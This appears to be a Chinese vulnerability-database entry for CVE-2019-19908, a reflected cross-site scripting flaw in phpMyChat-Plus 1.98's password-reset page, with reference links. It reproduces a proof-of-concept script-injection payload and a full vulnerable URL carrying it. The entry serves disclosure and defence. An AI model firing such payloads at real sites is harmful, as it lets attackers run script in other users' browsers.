phpMyChat-Plus 跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1870987 漏洞类型 跨站脚本
发布时间 2019-12-24 更新时间 2020-01-02
CVE编号 CVE-2019-19908 CNNVD-ID CNNVD-201912-957
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019120094
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201912-957
|漏洞详情
phpMyChat-Plus是一套基于PHP和MySQL的聊天室系统。 phpMyChat-Plus 1.98版本中存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
|漏洞EXP
# Exploit Title: phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting
# Date: 2019-12-19
# Exploit Author: Chris Inzinga
# Vendor Homepage: http://ciprianmp.com/latest/
# Download: https://sourceforge.net/projects/phpmychat/
# Tested On: Linux & Mac
# Version: 1.98
# CVE: CVE-2019-19908

Description: 
The "pmc_username" parameter of pass_reset.php is vulnerable to reflected XSS

Payload: 
"><script>alert('xss')</script>

Vulnerable URL: 
http://localhost/plus/pass_reset.php?L=english&pmc_username="><script>alert('xss')</script>
|参考资料

来源:MISC

链接:http://ciprianmp.com/


来源:sourceforge.net

链接:https://sourceforge.net/projects/phpmychat/


来源:cinzinga.github.io

链接:https://cinzinga.github.io/CVE-2019-19908/


来源:nvd.nist.gov

链接:https://nvd.nist.gov/vuln/detail/CVE-2019-19908